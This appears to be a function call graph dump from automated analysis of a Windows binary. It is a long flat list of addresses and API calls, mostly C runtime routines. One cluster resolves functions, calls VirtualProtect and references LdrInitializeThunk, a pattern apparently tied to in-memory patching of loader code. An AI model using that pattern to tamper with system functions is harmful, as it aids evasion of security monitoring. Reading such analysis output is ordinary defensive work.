33a37acd 6486->6488 6490 33a3571e 20 API calls 6488->6490 6491 33a37ae5 6489->6491 6492 33a35eb7 6489->6492 6490->6489 6493 33a35c45 5 API calls 6492->6493 6494 33a35ede 6493->6494 6495 33a35efc InitializeCriticalSectionAndSpinCount 6494->6495 6498 33a35ee7 6494->6498 6495->6498 6496 33a32ada 5 API calls 6497 33a35f13 6496->6497 6497->6489 6498->6496 7199 33a38640 7202 33a38657 7199->7202 7203 33a38665 7202->7203 7204 33a38679 7202->7204 7207 33a36368 20 API calls 7203->7207 7205 33a38693 7204->7205 7206 33a38681 7204->7206 7211 33a354a7 38 API calls 7205->7211 7214 33a38652 7205->7214 7208 33a36368 20 API calls 7206->7208 7209 33a3866a 7207->7209 7210 33a38686 7208->7210 7212 33a362ac 26 API calls 7209->7212 7213 33a362ac 26 API calls 7210->7213 7211->7214 7212->7214 7213->7214 6914 33a37bc7 6915 33a37bd3 6914->6915 6916 33a37c0a 6915->6916 6922 33a35671 RtlEnterCriticalSection 6915->6922 6918 33a37be7 6919 33a37f86 20 API calls 6918->6919 6920 33a37bf7 6919->6920 6923 33a37c10 6920->6923 6922->6918 6926 33a356b9 RtlLeaveCriticalSection 6923->6926 6925 33a37c17 6925->6916 6926->6925 6927 33a3a1c6 IsProcessorFeaturePresent 7215 33a3a945 7217 33a3a96d 7215->7217 7216 33a3a9a5 7217->7216 7218 33a3a997 7217->7218 7219 33a3a99e 7217->7219 7224 33a3aa17 7218->7224 7228 33a3aa00 7219->7228 7225 33a3aa20 7224->7225 7232 33a3b19b 7225->7232 7229 33a3aa20 7228->7229 7230 33a3b19b 21 API calls 7229->7230 7231 33a3a9a3 7230->7231 7233 33a3b1da 7232->7233 7238 33a3b25c 7233->7238 7242 33a3b59e 7233->7242 7235 33a3b286 7236 33a3b8b2 20 API calls 7235->7236 7237 33a3b292 7235->7237 7236->7237 7240 33a32ada 5 API calls 7237->7240 7238->7235 7239 33a378a3 5 API calls 7238->7239 7239->7235 7241 33a3a99c 7240->7241 7243 33a3b5c1 RaiseException 7242->7243 7244 33a3b5bc 7243->7244 7244->7238 5574 33a3c7c4 5585 33a3c7e6 GetModuleHandleA 5574->5585 5576 33a3c85f GetProcAddress 5580 33a3c82c 5576->5580 5577 33a3c7dd 5578 33a3c800 GetProcAddress 5577->5578 5577->5580 5584 33a3c83f 5577->5584 5579 33a3c80d VirtualProtect 5578->5579 5578->5580 5579->5580 5581 33a3c81c VirtualProtect 5579->5581 5582 33a3c872 LdrInitializeThunk 5580->5582 5583 33a3c835 GetModuleHandleA 5580->5583 5580->5584 5581->5580 5583->5584 5584->5576 5584->5580 5584->5584 5586 33a3c7ef 5585->5586 5592 33a3c82c 5585->5592 5597 33a3c803 GetProcAddress 5586->5597 5588 33a3c7f4 5591 33a3c800 GetProcAddress 5588->5591 5588->5592 5589 33a3c872 LdrInitializeThunk 5590 33a3c835 GetModuleHandleA 5594 33a3c83f 5590->5594 5591->5592 5593 33a3c80d VirtualProtect 5591->5593 5592->5589 5592->5590 5592->5594 5593->5592 5595 33a3c81c VirtualProtect 5593->5595 5594->5592 5596 33a3c85f GetProcAddress 5594->5596 5595->5592 5596->5592 5598 33a3c82c 5597->5598 5599 33a3c80d VirtualProtect 5597->5599 5601 33a3c872 LdrInitializeThunk 5598->5601 5602 33a3c835 GetModuleHandleA 5598->5602 5599->5598 5600 33a3c81c VirtualProtect 5599->5600 5600->5598 5604 33a3c83f 5602->5604 5603 33a3c85f GetProcAddress 5603->5604 5604->5598 5604->5603 6499 33a3508a 6500 33a3509c 6499->6500 6502 33a350a2 6499->6502 6503 33a35000 6500->6503 6504 33a3500d 6503->6504 6505 33a3502a 6503->6505 6506 33a35024 6504->6506 6507 33a3571e 20 API calls 6504->6507 6505->6502 6508 33a3571e 20 API calls 6506->6508 6507->6504 6508->6505 6509 33a38a89 6512 33a36d60 6509->6512 6513 33a36d69 6512->6513 6515 33a36d72 6512->6515 6516 33a36c5f 6513->6516 6517 33a35af6 38 API calls 6516->6517 6518 33a36c6c 6517->6518 6536 33a36d7e 6518->6536 6520 33a36c74 6545 33a369f3 6520->6545 6523 33a36c8b 6523->6515 6524 33a356d0 21 API calls 6525 33a36c9c 6524->6525 6532 33a36cce 6525->6532 6552 33a36e20 6525->6552 6527 33a3571e 20 API calls 6527->6523 6529 33a36cc9 6530 33a36368 20 API calls 6529->6530 6530->6532 6531 33a36d12 6531->6532 6562 33a368c9 6531->6562 6532->6527 6533 33a36ce6 6533->6531 6534 33a3571e 20 API calls 6533->6534 6534->6531 6537 33a36d8a 6536->6537 6538 33a35af6 38 API calls 6537->6538 6543 33a36d94 6538->6543 6540 33a36e18 6540->6520 6542 33a355a8 38 API calls 6542->6543 6543->6540 6543->6542 6544 33a3571e 20 API calls 6543->6544 6565 33a35671 RtlEnterCriticalSection 6543->6565 6566 33a36e0f 6543->6566 6544->6543 6570 33a354a7 6545->6570 6548 33a36a26 6550 33a36a3d 6548->6550 6551 33a36a2b GetACP 6548->6551 6549 33a36a14 GetOEMCP 6549->6550 6550->6523 6550->6524 6551->6550 6553 33a369f3 40 API calls 6552->6553 6554 33a36e3f 6553->6554 6557 33a36e90 IsValidCodePage 6554->6557 6559 33a36e46 6554->6559 6561 33a36eb5 6554->6561 6555 33a32ada 5 API calls 6556 33a36cc1 6555->6556 6556->6529 6556->6533 6558 33a36ea2 GetCPInfo 6557->6558 6557->6559 6558->6559 6558->6561 6559->6555 6717 33a36acb GetCPInfo 6561->6717 6790 33a36886 6562->6790 6564 33a368ed 6564->6532 6565->6543 6569 33a356b9 RtlLeaveCriticalSection 6566->6569 6568 33a36e16 6568->6543 6569->6568 6571 33a354c4 6570->6571 6572 33a354ba 6570->6572 6571->6572 6573 33a35af6 38 API calls 6571->6573 6572->6548 6572->6549 6574 33a354e5 6573->6574 6578 33a37a00 6574->6578 6579 33a37a13 6578->6579 6580 33a354fe 6578->6580 6579->6580 6586 33a37f0f 6579->6586 6582 33a37a2d 6580->6582 6583 33a37a40 6582->6583 6584 33a37a55 6582->6584 6583->6584 6585 33a36d7e 38 API calls 6583->6585 6584->6572 6585->6584 6587 33a37f1b 6586->6587 6588 33a35af6 38 API calls 6587->6588 6589 33a37f24 6588->6589 6597 33a37f72 6589->6597 6598 33a35671 RtlEnterCriticalSection 6589->6598 6591 33a37f42 6599 33a37f86 6591->6599 6596 33a355a8 38 API calls 6596->6597 6597->6580 6598->6591 6600 33a37f94 6599->6600 6602 33a37f56 6599->6602 6600->6602 6606 33a37cc2 6600->6606 6603 33a37f75 6602->6603 6716 33a356b9 RtlLeaveCriticalSection 6603->6716 6605 33a37f69 6605->6596 6605->6597 6607 33a37d42 6606->6607 6611 33a37cd8 6606->6611 6608 33a37d90 6607->6608 6610 33a3571e 20 API calls 6607->6610 6674 33a37e35 6608->6674 6612 33a37d64 6610->6612 6611->6607 6613 33a37d0b 6611->6613 6616 33a3571e 20 API calls 6611->6616 6614 33a3571e 20 API calls 6612->6614 6615 33a37d2d 6613->6615 6622 33a3571e 20 API calls 6613->6622 6617 33a37d77 6614->6617 6619 33a3571e 20 API calls 6615->6619 6620 33a37d00 6616->6620 6621 33a3571e 20 API calls 6617->6621 6618 33a37d9e 6624 33a37dfe 6618->6624 6633 33a3571e 20 API calls 6618->6633 6623 33a37d37 6619->6623 6634 33a390ba 6620->6634 6627 33a37d85 6621->6627 6628 33a37d22 6622->6628 6629 33a3571e 20 API calls 6623->6629 6625 33a3571e 20 API calls 6624->6625 6630 33a37e04 6625->6630 6631 33a3571e 20 API calls 6627->6631 6662 33a391b8 6628->6662 6629->6607 6630->6602 6631->6608 6633->6618 6635 33a390cb 6634->6635 6661 33a391b4 6634->6661 6636 33a390dc 6635->6636 6637 33a3571e 20 API calls 6635->6637 6638 33a390ee 6636->6638 6639 33a3571e 20 API calls 6636->6639 6637->6636 6640 33a39100 6638->6640 6641 33a3571e 20 API calls 6638->6641 6639->6638 6642 33a39112 6640->6642 6643 33a3571e 20 API calls 6640->6643 6641->6640 6644 33a39124 6642->6644 6645 33a3571e 20 API calls 6642->6645 6643->6642 6646 33a39136 6644->6646 6647 33a3571e 20 API calls 6644->6647 6645->6644 6648 33a39148 6646->6648 6649 33a3571e 20 API calls 6646->6649 6647->6646 6650 33a3915a 6648->6650 6651 33a3571e 20 API calls 6648->6651 6649->6648 6652 33a3916c 6650->6652 6653 33a3571e 20 API calls 6650->6653 6651->6650 6654 33a3917e 6652->6654 6655 33a3571e 20 API calls 6652->6655 6653->6652 6656 33a39190 6654->6656 6657 33a3571e 20 API calls 6654->6657 6655->6654 6658 33a3571e 20 API calls 6656->6658 6659 33a391a2 6656->6659 6657->6656 6658->6659 6660 33a3571e 20 API calls 6659->6660 6659->6661 6660->6661 6661->6613 6663 33a391c5 6662->6663 6664 33a3921d 6662->6664 6665 33a391d5 6663->6665 6666 33a3571e 20 API calls 6663->6666 6664->6615 6667 33a391e7 6665->6667 6668 33a3571e 20 API calls 6665->6668 6666->6665 6669 33a391f9 6667->6669 6670 33a3571e 20 API calls 6667->6670 6668->6667 6671 33a3920b 6669->6671 6672 33a3571e 20 API calls 6669->6672 6670->6669 6671->6664 6673 33a3571e 20 API calls 6671->6673 6672->6671 6673->6664 6675 33a37e60 6674->6675 6676 33a37e42 6674->6676 6675->6618 6676->6675 6680 33a3925d 6676->6680 6679 33a3571e 20 API calls 6679->6675 6681 33a37e5a 6680->6681 6682 33a3926e 6680->6682 6681->6679 6683 33a39221 20 API calls 6682->6683 6684 33a39276 6683->6684 6685 33a39221 20 API calls 6684->6685 6686 33a39281 6685->6686 6687 33a39221 20 API calls 6686->6687 6688 33a3928c 6687->6688 6689 33a39221 20 API calls 6688->6689 6690 33a39297 6689->6690 6691 33a39221 20 API calls 6690->6691 6692 33a392a5 6691->6692 6693 33a3571e 20 API calls 6692->6693 6694 33a392b0 6693->6694 6695 33a3571e 20 API calls 6694->6695 6696 33a392bb 6695->6696 6697 33a3571e 20 API calls 6696->6697 6698 33a392c6 6697->6698 6699 33a39221 20 API calls 6698->6699 6700 33a392d4 6699->6700 6701 33a39221 20 API calls 6700->6701 6702 33a392e2 6701->6702 6703 33a39221 20 API calls 6702->6703 6704 33a392f3 6703->6704 6705 33a39221 20 API calls 6704->6705 6706 33a39301 6705->6706 6707 33a39221 20 API calls 6706->6707 6708 33a3930f 6707->6708 6709 33a3571e 20 API calls 6708->6709 6710 33a3931a 6709->6710 6711 33a3571e 20 API calls 6710->6711 6712 33a39325 6711->6712 6713 33a3571e 20 API calls 6712->6713 6714 33a39330 6713->6714 6715 33a3571e 20 API calls 6714->6715 6715->6681 6716->6605 6718 33a36baf 6717->6718 6724 33a36b05 6717->6724 6721 33a32ada 5 API calls 6718->6721 6723 33a36c5b 6721->6723 6723->6559 6727 33a386e4 6724->6727 6726 33a38a3e 43 API calls 6726->6718 6728 33a354a7 38 API calls 6727->6728 6729 33a38704 MultiByteToWideChar 6728->6729 6731 33a38742 6729->6731 6732 33a387da 6729->6732 6734 33a356d0 21 API calls 6731->6734 6737 33a38763 6731->6737 6733 33a32ada 5 API calls 6732->6733 6735 33a36b66 6733->6735 6734->6737 6741 33a38a3e 6735->6741 6736 33a387d4 6746 33a38801 6736->6746 6737->6736 6739 33a387a8 MultiByteToWideChar 6737->6739 6739->6736 6740 33a387c4 GetStringTypeW 6739->6740 6740->6736 6742 33a354a7 38 API calls 6741->6742 6743 33a38a51 6742->6743 6750 33a38821 6743->6750 6747 33a3880d 6746->6747 6749 33a3881e 6746->6749 6748 33a3571e 20 API calls 6747->6748 6747->6749 6748->6749 6749->6732 6751 33a3883c 6750->6751 6752 33a38862 MultiByteToWideChar 6751->6752 6753 33a38a16 6752->6753 6754 33a3888c 6752->6754 6755 33a32ada 5 API calls 6753->6755 6757 33a356d0 21 API calls 6754->6757 6761 33a388ad 6754->6761 6756 33a36b87 6755->6756 6756->6726 6757->6761 6758 33a388f6 MultiByteToWideChar 6759 33a38962 6758->6759 6760 33a3890f 6758->6760 6763 33a38801 20 API calls 6759->6763 6777 33a35f19 6760->6777 6761->6758 6761->6759 6763->6753 6765 33a38971 6767 33a356d0 21 API calls 6765->6767 6770 33a38992 6765->6770 6766 33a38939 6766->6759 6768 33a35f19 11 API calls 6766->6768 6767->6770 6768->6759 6769 33a38a07 6772 33a38801 20 API calls 6769->6772 6770->6769 6771 33a35f19 11 API calls 6770->6771 6773 33a389e6 6771->6773 6772->6759 6773->6769 6774 33a389f5 WideCharToMultiByte 6773->6774 6774->6769 6775 33a38a35 6774->6775 6776 33a38801 20 API calls 6775->6776 6776->6759 6778 33a35c45 5 API calls 6777->6778 6779 33a35f40 6778->6779 6782 33a35f49 6779->6782 6785 33a35fa1 6779->6785 6783 33a32ada 5 API calls 6782->6783 6784 33a35f9b 6783->6784 6784->6759 6784->6765 6784->6766 6786 33a35c45 5 API calls 6785->6786 6787 33a35fc8 6786->6787 6788 33a32ada 5 API calls 6787->6788 6789 33a35f89 LCMapStringW 6788->6789 6789->6782 6791 33a36892 6790->6791 6798 33a35671 RtlEnterCriticalSection 6791->6798 6793 33a3689c 6799 33a368f1 6793->6799 6797 33a368b5 6797->6564 6798->6793 6811 33a37011 6799->6811 6801 33a3693f 6802 33a37011 26 API calls 6801->6802 6803 33a3695b 6802->6803 6804 33a37011 26 API calls 6803->6804 6805 33a36979 6804->6805 6806 33a368a9 6805->6806 6807 33a3571e 20 API calls 6805->6807 6808 33a368bd 6806->6808 6807->6806 6825 33a356b9 RtlLeaveCriticalSection 6808->6825 6810 33a368c7 6810->6797 6812 33a37022 6811->6812 6819 33a3701e 6811->6819 6813 33a37029 6812->6813 6816 33a3703c 6812->6816 6814 33a36368 20 API calls 6813->6814 6815 33a3702e 6814->6815 6817 33a362ac 26 API calls 6815->6817 6818 33a3706a 6816->6818 6816->6819 6821 33a37073 6816->6821 6817->6819 6820 33a36368 20 API calls 6818->6820 6819->6801 6822 33a3706f 6820->6822 6821->6819 6823 33a36368 20 API calls 6821->6823 6824 33a362ac 26 API calls 6822->6824 6823->6822 6824->6819 6825->6810 7245 33a35348 7246 33a33529 8 API calls 7245->7246 7247 33a3534f 7246->7247 7248 33a37b48 7258 33a38ebf 7248->7258 7252 33a37b55 7271 33a3907c 7252->7271 7255 33a37b7f 7256 33a3571e 20 API calls 7255->7256 7257 33a37b8a 7256->7257 7275 33a38ec8 7258->7275 7260 33a37b50 7261 33a38fdc 7260->7261 7262 33a38fe8 7261->7262 7295 33a35671 RtlEnterCriticalSection 7262->7295 7264 33a3905e 7309 33a39073 7264->7309 7265 33a38ff3 7265->7264 7267 33a39032 RtlDeleteCriticalSection 7265->7267 7296 33a3a09c 7265->7296 7270 33a3571e 20 API calls 7267->7270 7268 33a3906a 7268->7252 7270->7265 7272 33a39092 7271->7272 7274 33a37b64 RtlDeleteCriticalSection 7271->7274 7273 33a3571e 20 API calls 7272->7273 7272->7274 7273->7274 7274->7252 7274->7255 7276 33a38ed4 7275->7276 7285 33a35671 RtlEnterCriticalSection 7276->7285 7278 33a38f77 7290 33a38f97 7278->7290 7282 33a38ee3 7282->7278 7284 33a38e78 65 API calls 7282->7284 7286 33a37b94 RtlEnterCriticalSection 7282->7286 7287 33a38f6d 7282->7287 7283 33a38f83 7283->7260 7284->7282 7285->7282 7286->7282 7293 33a37ba8 RtlLeaveCriticalSection 7287->7293 7289 33a38f75 7289->7282 7294 33a356b9 RtlLeaveCriticalSection 7290->7294 7292 33a38f9e 7292->7283 7293->7289 7294->7292 7295->7265 7297 33a3a0a8 7296->7297 7298 33a3a0b9 7297->7298 7299 33a3a0ce 7297->7299 7300 33a36368 20 API calls 7298->7300 7308 33a3a0c9 7299->7308 7312 33a37b94 RtlEnterCriticalSection 7299->7312 7302 33a3a0be 7300->7302 7304 33a362ac 26 API calls 7302->7304 7303 33a3a0ea 7313 33a3a026 7303->7313 7304->7308 7306 33a3a0f5 7329 33a3a112 7306->7329 7308->7265 7577 33a356b9 RtlLeaveCriticalSection 7309->7577 7311 33a3907a 7311->7268 7312->7303 7314 33a3a033 7313->7314 7315 33a3a048 7313->7315 7316 33a36368 20 API calls 7314->7316 7321 33a3a043 7315->7321 7332 33a38e12 7315->7332 7318 33a3a038 7316->7318 7320 33a362ac 26 API calls 7318->7320 7320->7321 7321->7306 7322 33a3907c 20 API calls 7323 33a3a064 7322->7323 7338 33a37a5a 7323->7338 7325 33a3a06a 7345 33a3adce 7325->7345 7328 33a3571e 20 API calls 7328->7321 7576 33a37ba8 RtlLeaveCriticalSection 7329->7576 7331 33a3a11a 7331->7308 7333 33a38e2a 7332->7333 7334 33a38e26 7332->7334 7333->7334 7335 33a37a5a 26 API calls 7333->7335 7334->7322 7336 33a38e4a 7335->7336 7360 33a39a22 7336->7360 7339 33a37a66 7338->7339 7340 33a37a7b 7338->7340 7341 33a36368 20 API calls 7339->7341 7340->7325 7342 33a37a6b 7341->7342 7343 33a362ac 26 API calls 7342->7343 7344 33a37a76 7343->7344 7344->7325 7346 33a3adf2 7345->7346 7347 33a3addd 7345->7347 7348 33a3ae2d 7346->7348 7353 33a3ae19 7346->7353 7349 33a36355 20 API calls 7347->7349 7350 33a36355 20 API calls 7348->7350 7351 33a3ade2 7349->7351 7354 33a3ae32 7350->7354 7352 33a36368 20 API calls 7351->7352 7357 33a3a070 7352->7357 7533 33a3ada6 7353->7533 7356 33a36368 20 API calls 7354->7356 7358 33a3ae3a 7356->7358 7357->7321 7357->7328 7359 33a362ac 26 API calls 7358->7359 7359->7357 7361 33a39a2e 7360->7361 7362 33a39a36 7361->7362 7364 33a39a4e 7361->7364 7385 33a36355 7362->7385 7365 33a39aec 7364->7365 7368 33a39a83 7364->7368 7366 33a36355 20 API calls 7365->7366 7369 33a39af1 7366->7369 7388 33a38c7b RtlEnterCriticalSection 7368->7388 7372 33a36368 20 API calls 7369->7372 7370 33a36368 20 API calls 7379 33a39a43 7370->7379 7374 33a39af9 7372->7374 7373 33a39a89 7375 33a39aa5 7373->7375 7376 33a39aba 7373->7376 7377 33a362ac 26 API calls 7374->7377 7378 33a36368 20 API calls 7375->7378 7389 33a39b0d 7376->7389 7377->7379 7381 33a39aaa 7378->7381 7379->7334 7383 33a36355 20 API calls 7381->7383 7382 33a39ab5 7440 33a39ae4 7382->7440 7383->7382 7386 33a35b7a 20 API calls 7385->7386 7387 33a3635a 7386->7387 7387->7370 7388->7373 7390 33a39b3b 7389->7390 7427 33a39b34 7389->7427 7391 33a39b3f 7390->7391 7392 33a39b5e 7390->7392 7393 33a36355 20 API calls 7391->7393 7396 33a39baf 7392->7396 7397 33a39b92 7392->7397 7395 33a39b44 7393->7395 7394 33a32ada 5 API calls 7398 33a39d15 7394->7398 7399 33a36368 20 API calls 7395->7399 7400 33a39bc5 7396->7400 7443 33a3a00b 7396->7443 7401 33a36355 20 API calls 7397->7401 7398->7382 7402 33a39b4b 7399->7402 7446 33a396b2 7400->7446 7405 33a39b97 7401->7405 7406 33a362ac 26 API calls 7402->7406 7408 33a36368 20 API calls 7405->7408 7406->7427 7411 33a39b9f 7408->7411 7409 33a39bd3 7415 33a39bd7 7409->7415 7416 33a39bf9 7409->7416 7410 33a39c0c 7413 33a39c20 7410->7413 7414 33a39c66 WriteFile 7410->7414 7412 33a362ac 26 API calls 7411->7412 7412->7427 7419 33a39c56 7413->7419 7420 33a39c28 7413->7420 7417 33a39c89 GetLastError 7414->7417 7422 33a39bef 7414->7422 7421 33a39ccd 7415->7421 7453 33a39645 7415->7453 7458 33a39492 GetConsoleCP 7416->7458 7417->7422 7484 33a39728 7419->7484 7423 33a39c46 7420->7423 7424 33a39c2d 7420->7424 7421->7427 7428 33a36368 20 API calls 7421->7428 7422->7421 7422->7427 7431 33a39ca9 7422->7431 7476 33a398f5 7423->7476 7424->7421 7469 33a39807 7424->7469 7427->7394 7430 33a39cf2 7428->7430 7433 33a36355 20 API calls 7430->7433 7434 33a39cb0 7431->7434 7435 33a39cc4 7431->7435 7433->7427 7436 33a36368 20 API calls 7434->7436 7491 33a36332 7435->7491 7438 33a39cb5 7436->7438 7439 33a36355 20 API calls 7438->7439 7439->7427 7532 33a38c9e RtlLeaveCriticalSection 7440->7532 7442 33a39aea 7442->7379 7496 33a39f8d 7443->7496 7518 33a38dbc 7446->7518 7448 33a396c2 7449 33a396c7 7448->7449 7450 33a35af6 38 API calls 7448->7450 7449->7409 7449->7410 7451 33a396ea 7450->7451 7451->7449 7452 33a39708 GetConsoleMode 7451->7452 7452->7449 7456 33a3969f 7453->7456 7457 33a3966a 7453->7457 7454 33a396a1 GetLastError 7454->7456 7455 33a3a181 WriteConsoleW 7455->7457 7456->7422 7457->7454 7457->7455 7457->7456 7466 33a394f5 7458->7466 7468 33a39607 7458->7468 7459 33a32ada 5 API calls 7461 33a39641 7459->7461 7461->7422 7462 33a379e6 40 API calls 7462->7466 7463 33a3957b WideCharToMultiByte 7464 33a395a1 WriteFile 7463->7464 7463->7468 7465 33a3962a GetLastError 7464->7465 7464->7466 7465->7468 7466->7462 7466->7463 7467 33a395d2 WriteFile 7466->7467 7466->7468 7527 33a37c19 7466->7527 7467->7465 7467->7466 7468->7459 7473 33a39816 7469->7473 7470 33a398d8 7471 33a32ada 5 API calls 7470->7471 7474 33a398f1 7471->7474 7472 33a39894 WriteFile 7472->7473 7475 33a398da GetLastError 7472->7475 7473->7470 7473->7472 7474->7422 7475->7470 7479 33a39904 7476->7479 7477 33a39a0f 7478 33a32ada 5 API calls 7477->7478 7480 33a39a1e 7478->7480 7479->7477 7481 33a39986 WideCharToMultiByte 7479->7481 7483 33a399bb WriteFile 7479->7483 7480->7422 7482 33a39a07 GetLastError 7481->7482 7481->7483 7482->7477 7483->7479 7483->7482 7485 33a39737 7484->7485 7486 33a397ea 7485->7486 7488 33a397a9 WriteFile 7485->7488 7487 33a32ada 5 API calls 7486->7487 7489 33a39803 7487->7489 7488->7485 7490 33a397ec GetLastError 7488->7490 7489->7422 7490->7486 7492 33a36355 20 API calls 7491->7492 7493 33a3633d 7492->7493 7494 33a36368 20 API calls 7493->7494 7495 33a36350 7494->7495 7495->7427 7505 33a38d52 7496->7505 7498 33a39f9f 7499 33a39fa7 7498->7499 7500 33a39fb8 SetFilePointerEx 7498->7500 7501 33a36368 20 API calls 7499->7501 7502 33a39fd0 GetLastError 7500->7502 7503 33a39fac 7500->7503 7501->7503 7504 33a36332 20 API calls 7502->7504 7503->7400 7504->7503 7506 33a38d74 7505->7506 7507 33a38d5f 7505->7507 7509 33a36355 20 API calls 7506->7509 7511 33a38d99 7506->7511 7508 33a36355 20 API calls 7507->7508 7510 33a38d64 7508->7510 7512 33a38da4 7509->7512 7513 33a36368 20 API calls 7510->7513 7511->7498 7514 33a36368 20 API calls 7512->7514 7516 33a38d6c 7513->7516 7515 33a38dac 7514->7515 7517 33a362ac 26 API calls 7515->7517 7516->7498 7517->7516 7519 33a38dd6 7518->7519 7520 33a38dc9 7518->7520 7522 33a36368 20 API calls 7519->7522 7524 33a38de2 7519->7524 7521 33a36368 20 API calls 7520->7521 7523 33a38dce 7521->7523 7525 33a38e03 7522->7525 7523->7448 7524->7448 7526 33a362ac 26 API calls 7525->7526 7526->7523 7528 33a35af6 38 API calls 7527->7528 7529 33a37c24 7528->7529 7530 33a37a00 38 API calls 7529->7530 7531 33a37c34 7530->7531 7531->7466 7532->7442 7536 33a3ad24 7533->7536 7535 33a3adca 7535->7357 7537 33a3ad30 7536->7537 7547 33a38c7b RtlEnterCriticalSection 7537->7547 7539 33a3ad3e 7540 33a3ad70 7539->7540 7541 33a3ad65 7539->7541 7542 33a36368 20 API calls 7540->7542 7548 33a3ae4d 7541->7548 7544 33a3ad6b 7542->7544 7563 33a3ad9a 7544->7563 7546 33a3ad8d 7546->7535 7547->7539 7549 33a38d52 26 API calls 7548->7549 7550 33a3ae5d 7549->7550 7551 33a3ae63 7550->7551 7553 33a3ae95 7550->7553 7555 33a38d52 26 API calls 7550->7555 7566 33a38cc1 7551->7566 7553->7551 7556 33a38d52 26 API calls 7553->7556 7558 33a3ae8c 7555->7558 7559 33a3aea1 CloseHandle 7556->7559 7557 33a3aedd 7557->7544 7561 33a38d52 26 API calls 7558->7561 7559->7551 7562 33a3aead GetLastError 7559->7562 7560 33a36332 20 API calls 7560->7557 7561->7553 7562->7551 7575 33a38c9e RtlLeaveCriticalSection 7563->7575 7565 33a3ada4 7565->7546 7567 33a38cd0 7566->7567 7568 33a38d37 7566->7568 7567->7568 7574 33a38cfa 7567->7574 7569 33a36368 20 API calls 7568->7569 7570 33a38d3c 7569->7570 7571 33a36355 20 API calls 7570->7571 7572 33a38d27 7571->7572 7572->7557 7572->7560 7573 33a38d21 SetStdHandle 7573->7572 7574->7572 7574->7573 7575->7565 7576->7331 7577->7311 7578 33a3284f 7579 33a32882 27 API calls 7578->7579 7580 33a3285d 7579->7580 7581 33a3724e GetProcessHeap 5831 33a3220c 5832 33a32215 5831->5832 5833 33a3221a 5831->5833 5845 33a322b1 5832->5845 5837 33a320db 5833->5837 5836 33a32228 5838 33a320e7 5837->5838 5842 33a3210b 5838->5842 5844 33a320f6 5838->5844 5849 33a31eec 5838->5849 5840 33a3216d 5841 33a31eec 50 API calls 5840->5841 5840->5844 5841->5844 5842->5840 5843 33a31eec 50 API calls 5842->5843 5842->5844 5843->5840 5844->5836 5846 33a322c7 5845->5846 5848 33a322d0 5846->5848 6264 33a32264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5846->6264 5848->5833 5850 33a31ef7 5849->5850 5851 33a31f2a 5849->5851 5853 33a31f1c 5850->5853 5854 33a31efc 5850->5854 5892 33a32049 5851->5892 5874 33a31f3f 5853->5874 5855 33a31f12 5854->5855 5856 33a31f01 5854->5856 5866 33a323ec 5855->5866 5860 33a31f06 5856->5860 5861 33a3240b 5856->5861 5860->5842 5906 33a353e5 5861->5906 6015 33a33513 5866->6015 5871 33a32408 5871->5860 5872 33a3351e 7 API calls 5873 33a323f5 5872->5873 5873->5860 5875 33a31f4b 5874->5875 6033 33a3247c 5875->6033 5877 33a31f52 5878 33a32041 5877->5878 5879 33a31f7c 5877->5879 5883 33a31f57 5877->5883 6060 33a32639 IsProcessorFeaturePresent 5878->6060 6044 33a323de 5879->6044 5882 33a32048 5883->5860 5884 33a31f8b 5884->5883 6047 33a322fc RtlInitializeSListHead 5884->6047 5886 33a31f99 6048 33a346c5 5886->6048 5890 33a31fb8 5890->5883 6056 33a34669 5890->6056 5893 33a32055 5892->5893 5894 33a320d3 5893->5894 5895 33a3207d 5893->5895 5905 33a3205e 5893->5905 5896 33a32639 4 API calls 5894->5896 6137 33a3244c 5895->6137 5898 33a320da 5896->5898 5899 33a32082 6146 33a32308 5899->6146 5901 33a32087 6149 33a320c4 5901->6149 5903 33a3209f 6152 33a3260b 5903->6152 5905->5860 5912 33a35aca 5906->5912 5909 33a3351e 5986 33a33820 5909->5986 5911 33a32415 5911->5860 5913 33a35ad4 5912->5913 5916 33a32410 5912->5916 5914 33a35e08 11 API calls 5913->5914 5915 33a35adb 5914->5915 5915->5916 5917 33a35e5e 11 API calls 5915->5917 5916->5909 5918 33a35aee 5917->5918 5920 33a359b5 5918->5920 5921 33a359c0 5920->5921 5925 33a359d0 5920->5925 5926 33a359d6 5921->5926 5924 33a3571e 20 API calls 5924->5925 5925->5916 5927 33a359ef 5926->5927 5928 33a359e9 5926->5928 5930 33a3571e 20 API calls 5927->5930 5929 33a3571e 20 API calls 5928->5929 5929->5927 5931 33a359fb 5930->5931 5932 33a3571e 20 API calls 5931->5932 5933 33a35a06 5932->5933 5934 33a3571e 20 API calls 5933->5934 5935 33a35a11 5934->5935 5936 33a3571e 20 API calls 5935->5936 5937 33a35a1c 5936->5937 5938 33a3571e 20 API calls 5937->5938 5939 33a35a27 5938->5939 5940 33a3571e 20 API calls 5939->5940 5941 33a35a32 5940->5941 5942 33a3571e 20 API calls 5941->5942 5943 33a35a3d 5942->5943 5944 33a3571e 20 API calls 5943->5944 5945 33a35a48 5944->5945 5946 33a3571e 20 API calls 5945->5946 5947 33a35a56 5946->5947 5952 33a3589c 5947->5952 5958 33a357a8 5952->5958 5954 33a358c0 5955 33a358ec 5954->5955 5970 33a35809 5955->5970 5957 33a35910 5957->5924 5959 33a357b4 5958->5959 5966 33a35671 RtlEnterCriticalSection 5959->5966 5961 33a357e8 5967 33a357fd 5961->5967 5963 33a357be 5963->5961 5965 33a3571e 20 API calls 5963->5965 5964 33a357f5 5964->5954 5965->5961 5966->5963 5968 33a356b9 RtlLeaveCriticalSection 5967->5968 5969 33a35807 5968->5969 5969->5964 5971 33a35815 5970->5971 5978 33a35671 RtlEnterCriticalSection 5971->5978 5973 33a3581f 5979 33a35a7f 5973->5979 5975 33a35832 5983 33a35848 5975->5983 5977 33a35840 5977->5957 5978->5973 5980 33a35ab5 5979->5980 5981 33a35a8e 5979->5981 5980->5975 5981->5980 5982 33a37cc2 20 API calls 5981->5982 5982->5980 5984 33a356b9 RtlLeaveCriticalSection 5983->5984 5985 33a35852 5984->5985 5985->5977 5987 33a3382d 5986->5987 5991 33a3384b 5986->5991 5988 33a3383b 5987->5988 5992 33a33b67 5987->5992 5997 33a33ba2 5988->5997 5991->5911 6002 33a33a82 5992->6002 5994 33a33b81 5995 33a33b99 TlsGetValue 5994->5995 5996 33a33b8d 5994->5996 5995->5996 5996->5988 5998 33a33a82 5 API calls 5997->5998 5999 33a33bbc 5998->5999 6000 33a33bd7 TlsSetValue 5999->6000 6001 33a33bcb 5999->6001 6000->6001 6001->5991 6003 33a33aaa 6002->6003 6007 33a33aa6 6002->6007 6003->6007 6008 33a339be 6003->6008 6006 33a33ac4 GetProcAddress 